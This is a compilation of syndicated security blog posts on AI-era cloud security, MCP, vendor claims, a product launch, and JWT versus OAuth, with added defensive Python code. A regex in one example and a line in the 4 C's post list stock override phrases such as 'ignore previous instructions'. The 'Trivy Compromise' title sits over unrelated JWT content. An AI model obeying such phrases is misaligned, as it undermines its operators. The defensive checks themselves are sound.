<h2>The Evolution of the 4 C's in the AI Era</h2><p>Honestly, the old "4 C's" of cloud security—Cloud, Cluster, Container, and Code—feel like they're from a different century now that we're all obsessed with ai. It's funny because we spent years perfecting those layers, and then large language models showed up and basically broke the mental model.</p><p>The problem is that traditional security treats data like a static object sitting in a database, but in an ai-driven setup, data is constantly flowing through "context windows." It's not just about protecting the container anymore; it's about what the model is actually doing with the information it grabs. Standard cloud security doesn't really care about "model context," which is a huge blind spot. </p><p>When you have an ai agent in a healthcare setting pulling patient records to summarize a chart, the security risk isn't just a leaked api key—it's the agent getting "hallucinations" or being manipulated by a prompt injection. </p><ul> <li><strong>Static vs. Dynamic:</strong> Old workloads stayed put. New ai agents are basically digital employees that can browse the web, read your emails, and execute code on the fly.</li> <li><strong>The Context Gap:</strong> If a retail bot has access to your inventory but gets tricked into giving a 99% discount, your firewall isn't going to save you.</li> <li><strong>Enter MCP:</strong> We're seeing a shift toward the <strong>Model Context Protocol (mcp)</strong>. To put it simply, mcp is an open standard that lets developers build secure, two-way connections between data sources and ai models. 
It's a way to standardize how these models talk to data securely, so we aren't just winging it with custom integrations.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-1.svg" alt="Diagram 1"></p><p>According to a <a href="https://www.ibm.com/reports/data-breach">2024 report by IBM</a>, the average cost of a breach is hitting record highs, and as ai becomes the backbone of infrastructure, these costs are only going up if we don't adapt. </p><p>Next, we'll look at how the first "C"—Cloud—is getting a massive makeover for the ai age.</p><h2>Cloud: GPU Availability and Specialized VPCs</h2><p>When we talk about the first "C"—Cloud—it’s not just about where your data sits anymore. In the ai era, the cloud layer is being redefined by the massive demand for compute. We're seeing a shift toward specialized VPCs (Virtual Private Clouds) designed specifically for model training and inference. </p><p>If you're running heavy workloads, your cloud security now involves managing GPU availability and ensuring that the specialized hardware isn't creating new holes in your perimeter. You have to worry about how your ai models are partitioned off from the rest of your corporate network.</p><ul> <li><strong>Specialized AI Infrastructure:</strong> We're moving toward dedicated clusters for llms where the networking is tuned for high-speed data transfer between nodes.</li> <li><strong>GPU-Aware Security:</strong> Your cloud provider handles the physical hardware, but you're now responsible for the security of the actual data flowing into those GPUs.</li> <li><strong>Future-Proofing with Quantum:</strong> As a side note, we also need to think about "quantum-hardened" connectivity. 
While it's a bit of a future problem, "harvest now, decrypt later" attacks mean we should start looking at post-quantum cryptography (PQC) for our cloud tunnels sooner than later.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-2.svg" alt="Diagram 2"></p><p>A 2024 study by Deloitte found that most organizations aren't prepared for these new infrastructure demands, which is wild considering how much data we're pumping into ai right now. </p><p>Next, we're diving into the "Cluster" layer to see how we manage these ai workloads without losing our minds.</p><h2>Cluster: Orchestration and Control Planes</h2><p>Managing a cluster used to just be about keeping the lights on, but now that we're cramming ai models into every corner of our infrastructure, things have gotten… messy. The "Cluster" layer is all about orchestration—usually kubernetes—and how the control plane manages these complex ai agents.</p><p>If your kubernetes nodes are chatting with sensitive data via mcp, you can't just slap a basic network policy on it and call it a day. You need to focus on how the control plane is authenticated. I've seen so many teams struggle to get their mcp servers running because they try to hand-code every single connection. </p><p>Honestly, it's a nightmare. That's why tools like <strong>Gopher Security</strong> are such a lifesaver. 
Gopher is a platform used to automate the security layer for mcp servers—it basically acts as the glue that ensures your cluster orchestration stays secure without you having to write a thousand lines of yaml.</p><ul> <li><strong>Zero-Trust Clusters:</strong> Your ai agent shouldn't just have a "golden ticket" to every database in the cluster.</li> <li><strong>Control Plane Integrity:</strong> Protecting the kubernetes api is more important than ever when it's managing models that have access to your entire data lake.</li> </ul><h2>Container: Image Security and Model Weights</h2><p>Now, let's talk about the "Container" layer specifically. This is where the actual ai runtimes live—things like Ollama or vLLM. Container security for ai is a different beast because these images are huge. You aren't just scanning a tiny linux distro; you're dealing with massive layers containing model weights and specialized libraries.</p><ul> <li><strong>Scanning Base Images:</strong> You need to be scanning those model-serving runtimes for vulnerabilities. If your base image for vLLM has a critical bug, your whole ai stack is at risk.</li> <li><strong>Managing Model Weights:</strong> Storing large model weights inside container layers can be a security nightmare. You need to ensure those weights haven't been tampered with (model poisoning) before they're loaded into memory.</li> <li><strong>Runtime Protection:</strong> Use tools that monitor what's happening inside the container. 
If a retail bot in a container starts trying to execute shell commands, your runtime protection should kill it instantly.</li> </ul><p>According to a 2024 report by Palo Alto Networks, nearly 80% of organizations have found high-risk roles in their cloud infrastructure, which is a terrifying thought when you realize how much power a containerized ai agent has.</p><pre><code class="language-python"># Example of using a tool to secure the connection from mcp_server import SecureServer # Gopher is the platform that automates this security layer app = SecureServer(name="Inventory-Bot") @app.tool(schema_path="./inventory_api.json") def get_stock(item_id: str): # Gopher handles the auth handshake and validation here return database.query(item_id) </code></pre><p>Next up, we're looking at the "Code" layer—because even the best cluster can't save you from buggy, insecure logic.</p><h2>Code: Protecting the Logic and Data Flow</h2><p>Writing code used to be about logic and loops, but now that we’re plugging ai into everything, your code is basically a giant open door if you aren't careful. It's one thing to have a bug in a checkout script, but it's a whole different disaster when your code lets a model hallucinate its way into your admin panel.</p><p>The "Code" layer in the 4 C's is where the rubber meets the road for mcp. If you don't have tight controls on how your apps talk to these models, you're just asking for trouble. </p><ul> <li><strong>Deep Packet Inspection for AI:</strong> You can't just trust the traffic. You need to look inside the mcp requests to see if the model is trying to do something weird.</li> <li><strong>Granular Policy Engines:</strong> I’m talking about parameter-level restrictions. 
If a tool is supposed to fetch a "user_id," your code should reject any request that tries to inject a system prompt like "ignore previous instructions" into that field.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-3.svg" alt="Diagram 3"></p><p>In a recent study, <strong>Snyk</strong> (2024) pointed out that insecure ai-generated code is already showing up in production environments. Whether you're in fintech or building a simple retail bot, the logic layer is your last line of defense. </p><p>Moving from these technical implementations to a broader strategy requires a "Context-First" approach. This means shifting our focus from just fixing bugs to meeting the regulatory and compliance frameworks that govern how ai handles data.</p><h2>Future-Proofing Your 4 C's Strategy</h2><p>So, you've got the 4 C's down, but how do you keep this whole ai-powered house of cards from falling over when the next big threat hits? It's really about making security part of the plumbing, not just a shiny badge you slap on at the end.</p><p>Mapping your stack to standards like SOC 2 or ISO 27001 is a massive pain, especially with mcp servers popping up everywhere. You need continuous monitoring that actually understands what an "anomaly" looks like in an ai context window.</p><ul> <li><strong>Living Audit Logs:</strong> Don't just log that a connection happened; log the <em>intent</em>. If a finance bot suddenly asks for pii it doesn't need, your system should flag that as a policy violation immediately.</li> <li><strong>Ethics by Design:</strong> Ensure your code layer filters for bias. 
According to <a href="https://snyk.io/reports/ai-code-security/">Snyk</a> (2024), AI-generated code often misses basic safety checks, so manual reviews are still a must for high-risk healthcare or banking apps.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/68e48f8dc1f49fce36589012/what-are-the-4-cs-of-cloud-security/mermaid-diagram-4.svg" alt="Diagram 4"></p><p>Honestly, the goal is to reach a spot where your infrastructure defends itself. If you're building for the long haul, focus on that "context-first" mindset and you'll be fine. Stay safe out there.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/automated-cryptographic-agility-frameworks-ai-resource-orchestration">https://www.gopher.security/blog/automated-cryptographic-agility-frameworks-ai-resource-orchestration</a></p>
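<p>The parameter-level rejection and intent logging that the 4 C's post above calls for, written out as an added Python example (not code from the post or from the Gopher platform). The per-tool parameter specs, the list of instruction-like phrases, the data-class labels and the three sample tool calls are all constructed here for illustration; a real deployment would load the specs from the tool's declared schema.</p>

```python
"""Parameter-level policy checks and intent logging for AI tool calls.

Added example; not code from the post or its platform. It assumes a minimal
tool-call shape (tool name plus an args dict) and a per-tool spec that is
constructed inline below.
"""
import re
from dataclasses import dataclass, field

# Constructed per-tool specs: each parameter gets a strict shape, and each
# tool declares which data classes it legitimately needs.
TOOL_SPECS = {
    "get_stock": {
        "params": {"item_id": r"[A-Z]{3}-\d{4,6}"},
        "needs": set(),                       # no personal data required
    },
    "lookup_customer": {
        "params": {"user_id": r"[0-9]{1,12}"},
        "needs": {"pii"},
    },
}

# Phrases that have no business appearing in a structured identifier field.
INJECTION_MARKERS = re.compile(
    r"ignore (all |any )?(previous|prior) instructions|system prompt|you are now",
    re.IGNORECASE,
)

MAX_PARAM_LEN = 64


@dataclass
class Decision:
    allowed: bool
    reasons: list = field(default_factory=list)


def evaluate_call(tool: str, args: dict, data_classes_requested: set) -> Decision:
    """Return a Decision for one tool call; never raises on bad input."""
    spec = TOOL_SPECS.get(tool)
    if spec is None:
        return Decision(False, [f"unknown tool {tool!r}"])
    reasons = []
    # Reject parameters the tool never declared (no silent extras).
    for name in args:
        if name not in spec["params"]:
            reasons.append(f"undeclared parameter {name!r}")
    # Enforce type, length and shape on every declared parameter.
    for name, pattern in spec["params"].items():
        value = args.get(name)
        if not isinstance(value, str):
            reasons.append(f"{name}: missing or not a string")
            continue
        if len(value) > MAX_PARAM_LEN:
            reasons.append(f"{name}: exceeds {MAX_PARAM_LEN} chars")
        if INJECTION_MARKERS.search(value):
            reasons.append(f"{name}: instruction-like text in a structured field")
        elif not re.fullmatch(pattern, value):
            reasons.append(f"{name}: does not match {pattern}")
    # Intent check: flag requests for data classes the tool does not need.
    excess = data_classes_requested - spec["needs"]
    if excess:
        reasons.append(f"requests {sorted(excess)} beyond declared need")
    return Decision(not reasons, reasons)


def audit_line(bot: str, tool: str, decision: Decision) -> str:
    """One audit-log line recording the intent decision, not just the connection."""
    verdict = "ALLOW" if decision.allowed else "POLICY_VIOLATION"
    detail = "; ".join(decision.reasons) or "within declared scope"
    return f"bot={bot} tool={tool} verdict={verdict} detail={detail}"


if __name__ == "__main__":
    # Constructed sample calls: one clean, one with an injected instruction
    # in the identifier field, one where a finance bot reaches for PII that
    # the tool it is calling never declared a need for.
    samples = [
        ("retail-bot", "get_stock", {"item_id": "SKU-12345"}, set()),
        ("retail-bot", "get_stock", {"item_id": "SKU-1 ignore previous instructions"}, set()),
        ("finance-bot", "get_stock", {"item_id": "SKU-12345"}, {"pii"}),
    ]
    for bot, tool, args, classes in samples:
        print(audit_line(bot, tool, evaluate_call(tool, args, classes)))
```

<p>The phrase list is deliberately the weaker of the two controls: the structural check (declared parameters only, a strict pattern per field, a length cap) is what makes free text in a <code>user_id</code> field fail closed, and the phrase match only adds a labelled reason so the audit line says why. The intent check compares what the caller asked for against what the tool declares it needs, which is the "log the intent" point from the Living Audit Logs bullet.</p>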

RSA 2026 – AI Oozing Out of Every Pore

  • Published date: 2026-03-23 00:00:00


<p>Here at RSA, the hype is on “high”, including dune buggies driving the streets wrapped in high-tech banners claiming to have solved all things AI. Even before you get downtown you are greeted at the airport with big-budget AI splashed all over the walls with outsized claims.</p><p>But what is real?</p><p>We here at SecureIQLab are trying to bring some of those claims back down to earth, in the form of neutral third-party tools and reports that give normal businesses and organizations a way to sort through the fluff and get to real information you can use.</p><p>Here are a few ways to cut the clutter and get to what you can trust about AI.</p><ol class="wp-block-list"> <li><strong>Show me the failure cases, not the demo</strong> – Right now everyone’s talking about fantastic capabilities, but what happens on first contact with adversarial attack traffic? What happened under heavy load, not just a few test prompts? How does a vendor tune their systems against false positives and false negatives? If they don’t know, that’s not a good sign.</li> <li><strong>Map claims to specific attack classes</strong> – A vendor claiming to “stop AI threats” is vague, at best. Better to ask “Which of the OWASP LLM Top 10 do you actually stop, and how do you prove it?” For example: <ol class="wp-block-list"> <li>Prompt Injection – How did you test it?</li> <li>Data exfiltration – Did you monitor it, or block it?</li> <li>Model extraction – How did you measure it?</li> </ol> </li> <li><strong>Separate detection from prevention</strong> – Right now, many AI “security” tools are little more than telemetry engines. Better to ask “Is your tool blocking, or just monitoring?” and “How many attacks are blocked automatically?”</li> <li><strong>Ask for an independent assessment</strong> – Right now, many vendors are basically grading their own papers and producing “surprisingly” good results. But self-testing is an awful lot like not testing, and just as likely to survive when faced with real adversarial traffic. If there’s no third-party validation, assume you’re still looking at a demo.</li> </ol><p>At RSA, AI is everywhere, but clarity is not. It’s a good time to gather information, with a healthy dose of skepticism, and ask some specific, pointed questions. Solid, tested vendors won’t just show you their successes but also their failures, where they’re learning, and how they’re evolving their products to face real-world threats.</p><p>If you’re at RSAC 2026, book a meeting with me to see our SOCx + AI validation demo or to learn more about our AI Security CyberRisk Validation Methodology v1.0, releasing this week.</p><p><a href="https://secureiqlab.com/go/rsa-live?utm_content=livedays_blog1">Meet Me at RSAC 2026 »</a></p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://secureiqlab.com">SecureIQ Lab</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Cameron Camp">Cameron Camp</a>. Read the original post at: <a href="https://secureiqlab.com/rsa-2026-ai-oozing-out-of-every-pore/">https://secureiqlab.com/rsa-2026-ai-oozing-out-of-every-pore/</a></p>

Black Duck Signal: Security that moves at the speed of AI

  • Published date: 2026-03-23 00:00:00


<p>AI has fundamentally changed how software is built. AI agents are now designing architectures, writing functions, and deploying features autonomously. Developers are shipping code at velocities that would have been unimaginable just a year ago. This isn’t incremental progress; it’s a complete reimagining of software development.</p><p>This transformation comes with a critical challenge that every organization must meet: how to secure software that’s created faster than any human, or any traditional security tool, can keep pace with.</p><p>I’m proud to announce the general availability of <a href="https://www.blackduck.com/signal-ai-appsec.html">Black Duck Signal</a><sup>™</sup>, our answer to this challenge. It provides something the market desperately needs: a new model for application security that combines the power of AI with two decades of battle-tested security intelligence.</p><h2>The security gap in AI-driven development</h2><p>As agentic AI takes the driver’s seat in software creation, developers face application risk at unprecedented speed and scale. Traditional application security testing (AST) tools weren’t designed for this reality. They were designed for code that was written sequentially, intentionally, and only by humans. They scan periodically, alert cautiously, and operate out of band. In an agentic world, that model collapses. Agentic AI is capable of producing hundreds of changes per hour, across multiple components, APIs, and configurations. Code reviews can’t scale that mountain of code, so changes are going into repos unseen.</p><p>Generic AI-powered security tools have emerged to address this gap, but they lack the one ingredient that enterprise security absolutely depends on: context. By context, I mean the deep understanding of an application’s components, relationships, data flows, frameworks, and runtime behavior that gives AI the grounding it needs to make accurate security decisions. Without it, AI tools face three critical limitations: hallucinations, noise, and remediation errors. They generate plausible-sounding but inaccurate findings, and they overwhelm teams with false positives and suggested theoretical fixes that fail in production environments. When you’re securing enterprise-grade software at AI scale, this is simply unacceptable.</p><h2>ContextAI: Where AI meets two decades of security expertise</h2><p>This is where Signal fundamentally differs from every other solution in the market. At its core, Signal is powered by ContextAI™, our purpose-built application security model containing petabytes of human-vetted security intelligence. ContextAI has something no generic AI can replicate: 20+ years of security ground truth from thousands of real-world proprietary and open source codebases.</p><p>Think about what that means. When Signal analyzes your code, it’s not applying LLM reasoning in a vacuum. It’s augmenting AI with petabytes of context from Black Duck’s living knowledge base, meticulously curated from hundreds of thousands of commercial and open source codebases. It’s applying context from coding rule sets exercised over billions of lines of code to deterministically identify quality and security issues across more than 40 programming languages. It’s drawing on tens of thousands of BSIMM assessments, Black Duck Audits, and dynamic scans of production web applications: millions of tests across trillions of lines of real-world code.</p><p>This isn’t theoretical knowledge generated by a language model. This is real-world intelligence gleaned from securing mission-critical software across every industry, every language, and every framework you can imagine. This context is what transforms AI from a promising technology into a production-ready security solution that enterprises can trust.</p><h2>Agentic AI that reasons, validates, and acts</h2><p>Signal operates differently than traditional AST tools or single-model AI solutions. Built on an agentic AI architecture, Signal deploys multiple specialized AI security agents that work together to analyze vulnerabilities, validate exploitability, prioritize risk, and recommend or apply fixes using human-like reasoning. Where other solutions stop at identifying potential issues, Signal reasons about them with the depth and nuance of experienced security professionals.</p><p>The practical impact is transformative. Signal actively addresses severe and complex vulnerabilities, including those based on business logic errors or in languages not supported by traditional AST tools. It goes beyond simple pattern-matching by using multiple analysis techniques to accurately match artifacts with security context in real time. By combining LLM reasoning with ContextAI’s security intelligence, Signal delivers high-fidelity analysis and automated remediation that solutions built on general AI models alone can’t deliver.</p><h2>Built for modern development workflows</h2><p>Signal integrates directly into the agentic software development life cycle through Model Context Protocol and APIs that support AI coding assistants, IDEs, and automated AI pipelines. It works seamlessly with GitHub Copilot, Google Gemini, Claude Code, Cursor, and other popular development tools. Signal scans code in real time as it’s written, continuously analyzing across languages, frameworks, and architectures.</p><h2>Unlocking AI’s true potential through governance</h2><p>AI-driven development forces organizations to confront an uncomfortable truth: the very speed that makes AI transformative can become its greatest liability without proper governance. At machine speed, even minor security defects can multiply into major risks, threatening to erode the gains that AI promises.</p><p>Signal unlocks AI’s true potential by enabling enterprises to govern AI-generated software responsibly and at scale. It helps organizations move faster with AI while maintaining the security, compliance, and trust that enterprises and governments demand across the entire application life cycle.</p><h2>The future is now</h2><p>AI is no longer just accelerating development. It’s actively authoring software. The organizations that will lead in this new era are those that harness this unprecedented power with intelligence and strong governance, transforming autonomous coding into a strategic advantage while minimizing risk.</p><p>Black Duck Signal is available now. I invite you to see how Signal combines AI with two decades of security context to eliminate noise, reduce risk, and secure your AI-powered development at the speed of innovation.</p><p><a href="https://www.blackduck.com/signal-ai-appsec/demo.html">Learn more about Signal AI</a></p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.blackduck.com/blog.html">Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Jason Schmitt">Jason Schmitt</a>. Read the original post at: <a href="https://www.blackduck.com/blog/black-duck-signal-security-that-moves-at-the-speed-of-ai.html">https://www.blackduck.com/blog/black-duck-signal-security-that-moves-at-the-speed-of-ai.html</a></p>

The Trivy Compromise: The Fallacy of Secrets Management and the Case for Workload Identity

  • Apurva Dave
  • Published date: 2026-03-23 00:00:00


<div data-elementor-type="wp-post" data-elementor-id="56445" class="elementor elementor-56445" data-elementor-post-type="post"> <div class="elementor-element elementor-element-6f26a2cf e-flex e-con-boxed e-con e-parent" data-id="6f26a2cf" data-element_type="container" data-e-type="container"> <div class="e-con-inner"> <div class="elementor-element elementor-element-3637114d elementor-widget elementor-widget-text-editor" data-id="3637114d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">JWT and OAuth show up together in nearly every authentication system, which is why engineers often treat them as interchangeable. They are not. OAuth is an authorization framework that defines how to grant access. JWT is a token format that defines how to package and transmit claims. They solve different problems, and most production systems use both.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The confusion between them leads to real security gaps, especially in machine-to-machine communication, where workloads cannot use browser logins or MFA prompts. Understanding where JWT ends and OAuth begins is the first step toward implementing <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/7-ways-to-authenticate-workloads-to-each-other/">workload authentication</a> correctly.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">JWT vs. 
OAuth: What’s the Difference?</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">OAuth 2.0 governs how applications <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/mcp-oauth-2-1-pkce-and-the-future-of-ai-authorization/">obtain limited access</a> to resources without exposing credentials. It specifies multiple authorization flows for different scenarios and manages the lifecycle of access tokens: issuance, scoping, refresh and revocation. OAuth determines what a requester can access, not who they are.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The authorization code flow is designed for web applications where server-side code can securely store secrets and handle user consent. The client credentials flow is built for machine-to-machine communication where no user interaction occurs: services authenticate directly to the authorization server using their client ID and secret to receive access tokens. Token exchange (RFC 8693) enables workloads to swap one token type for another across trust boundaries, such as exchanging an AWS IAM token for an Azure access token.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">JSON Web Token (JWT) is a compact, URL-safe token format for transmitting information between parties as a signed JSON object. Every JWT contains a header declaring the signing algorithm, a payload carrying claims (issuer, subject, audience, expiration, permissions) and a cryptographic signature that proves the token has not been tampered with. 
Because all necessary information is embedded in the token itself, receiving services can validate JWTs locally without calling back to a central server.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The core distinction is that OAuth is a protocol defining a process, while JWT is a format defining a data structure. In practice, OAuth often issues JWTs as its access tokens, which is why the two appear together so frequently.</p> <div class="overflow-x-auto w-full px-2 mb-6"> <table class="min-w-full border-collapse text-sm leading-[1.7] whitespace-normal"> <thead class="text-left"> <tr> <th class="text-text-100 border-b-0.5 border-border-300/60 py-2 pr-4 align-top font-bold" scope="col"> </th> <th class="text-text-100 border-b-0.5 border-border-300/60 py-2 pr-4 align-top font-bold" scope="col">JWT</th> <th class="text-text-100 border-b-0.5 border-border-300/60 py-2 pr-4 align-top font-bold" scope="col">OAuth</th> </tr> </thead> <tbody> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>What it is</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">A token format (RFC 7519)</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">An authorization framework (RFC 6749)</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Primary role</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Package and transmit signed claims between parties</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Delegate and control access to protected resources</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Statefulness</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Stateless: validated locally using the signature and claims</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Stateful: requires an authorization 
server to issue and manage tokens</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Revocation</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Cannot be revoked before expiration without additional infrastructure</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Tokens can be revoked at the authorization server</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Scope</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Carries claims; does not define how tokens are issued or refreshed</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Defines issuance, refresh, scoping and revocation workflows</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Use alone?</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Yes, for simple signed assertions between trusted parties</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Yes, but needs a token format (often JWT) to carry access information</td> </tr> <tr> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top"><strong>Common pairing</strong></td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Used as the token format inside OAuth flows</td> <td class="border-b-0.5 border-border-300/30 py-2 pr-4 align-top">Issues JWTs as access tokens and uses OIDC for identity</td> </tr> </tbody> </table> </div> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">How JWT and OAuth Work Together</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">In most production systems, OAuth and JWT complement each other rather than competing. OAuth 2.0 defines the authorization flow and token lifecycle. 
<a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/oauth-vs-oidc-difference-when-to-use/">OpenID Connect</a> (OIDC), an identity layer built on top of OAuth 2.0, adds authentication by issuing ID tokens as JWTs that contain verified claims about the authenticated entity.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">A typical workload authentication flow using both protocols:</p> <ol class="[li_&amp;]:mb-0 [li_&amp;]:mt-1 [li_&amp;]:gap-1 [&amp;:not(:last-child)_ul]:pb-1 [&amp;:not(:last-child)_ol]:pb-1 list-decimal flex flex-col gap-1 pl-8 mb-3"> <li class="whitespace-normal break-words pl-2">A service needs access to a protected resource and authenticates to the OAuth authorization server using the client credentials flow.</li> <li class="whitespace-normal break-words pl-2">The authorization server validates the credentials, evaluates access policies and issues a JWT access token containing the authorized scopes and claims.</li> <li class="whitespace-normal break-words pl-2">The service presents this JWT to the resource server, which validates the signature and claims before granting access.</li> </ol> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">This pairing works because OAuth handles the complexity of token issuance and lifecycle management while JWT enables the resource server to validate tokens locally without calling back to the authorization server on every request. In distributed systems with hundreds of microservices, that local validation eliminates a network round trip on every API call.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The confusion between JWT and OAuth often stems from their overlapping presence in this flow. 
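</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The three-step flow above, together with the header/payload/signature structure and local validation described earlier, as an added Python example that is not part of the original post. It assumes a shared HMAC key (HS256) so that both sides run offline with the standard library; a production authorization server would normally sign with an asymmetric algorithm such as RS256 and publish its public keys so resource servers hold no signing secret. The issuer and audience URLs, the client registry and the scope policy are constructed for illustration.</p>

```python
"""Client-credentials grant issuing a short-lived JWT, validated locally by the resource server.

Added example; not code from the post. Assumption: authorization server and
resource server share one HS256 key (see lead-in). Client registry and policy
are constructed inline.
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

SHARED_KEY = b"constructed-demo-key-not-for-production"
ISSUER = "https://auth.example"    # hypothetical authorization server
AUDIENCE = "inventory-api"         # hypothetical resource server

# Constructed client registry: each client holds a secret and a scope allow-list.
CLIENTS = {
    "retail-bot": {"secret": "s3cret-one", "allowed_scopes": {"stock:read"}},
}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, key: bytes) -> str:
    """Authorization server side: header.payload.signature with HS256."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def client_credentials_grant(client_id: str, client_secret: str, scope: str,
                             now: Optional[int] = None) -> str:
    """Steps 1 and 2: authenticate the client, apply policy, mint a short-lived JWT."""
    now = int(time.time()) if now is None else now
    client = CLIENTS.get(client_id)
    # Constant-time compare so the secret check does not leak timing information.
    if client is None or not hmac.compare_digest(client["secret"], client_secret):
        raise PermissionError("invalid_client")
    requested = set(scope.split())
    if not requested <= client["allowed_scopes"]:
        raise PermissionError("invalid_scope")
    claims = {
        "iss": ISSUER, "sub": client_id, "aud": AUDIENCE,
        "iat": now, "exp": now + 300,          # 5-minute lifetime bounds exposure
        "scope": " ".join(sorted(requested)),
    }
    return sign_jwt(claims, SHARED_KEY)


def validate_jwt(token: str, key: bytes, required_scope: str,
                 now: Optional[int] = None) -> dict:
    """Step 3, resource server side: verify locally, no call back to the issuer."""
    now = int(time.time()) if now is None else now
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(_b64url_decode(h64))
        claims = json.loads(_b64url_decode(p64))
    except ValueError:                     # covers bad base64 and bad JSON
        raise PermissionError("malformed_token")
    # Pin the algorithm: the verifier, never the token, decides how to verify.
    if header.get("alg") != "HS256":
        raise PermissionError("unexpected_alg")
    expected = hmac.new(key, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s64)):
        raise PermissionError("bad_signature")
    if claims.get("iss") != ISSUER:
        raise PermissionError("bad_issuer")
    if claims.get("aud") != AUDIENCE:
        raise PermissionError("bad_audience")
    if not isinstance(claims.get("exp"), int) or now >= claims["exp"]:
        raise PermissionError("expired")
    if required_scope not in claims.get("scope", "").split():
        raise PermissionError("insufficient_scope")
    return claims


def tamper_scope(token: str, new_scope: str) -> str:
    """Rewrite the payload without re-signing; used only to show validation rejects it."""
    h64, p64, s64 = token.split(".")
    claims = json.loads(_b64url_decode(p64))
    claims["scope"] = new_scope
    return f"{h64}.{_b64url(json.dumps(claims, separators=(',', ':')).encode())}.{s64}"


if __name__ == "__main__":
    t0 = 1_700_000_000   # fixed clock so the run is reproducible
    token = client_credentials_grant("retail-bot", "s3cret-one", "stock:read", now=t0)
    print("accepted:", validate_jwt(token, SHARED_KEY, "stock:read", now=t0 + 10))
    for label, bad, at in [("tampered", tamper_scope(token, "stock:write"), t0 + 10),
                           ("expired", token, t0 + 600)]:
        try:
            validate_jwt(bad, SHARED_KEY, "stock:read", now=at)
        except PermissionError as err:
            print(label, "->", err)
```

<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Two details carry the security weight. The resource server pins the algorithm instead of reading it from the header, so a token whose header says <code>none</code> or names a different algorithm is refused before any signature work. And because validation is entirely local, nothing in this code can revoke a leaked token before its <code>exp</code>, which is exactly the revocation trade-off in the table above and the reason the lifetime is kept to minutes.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">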
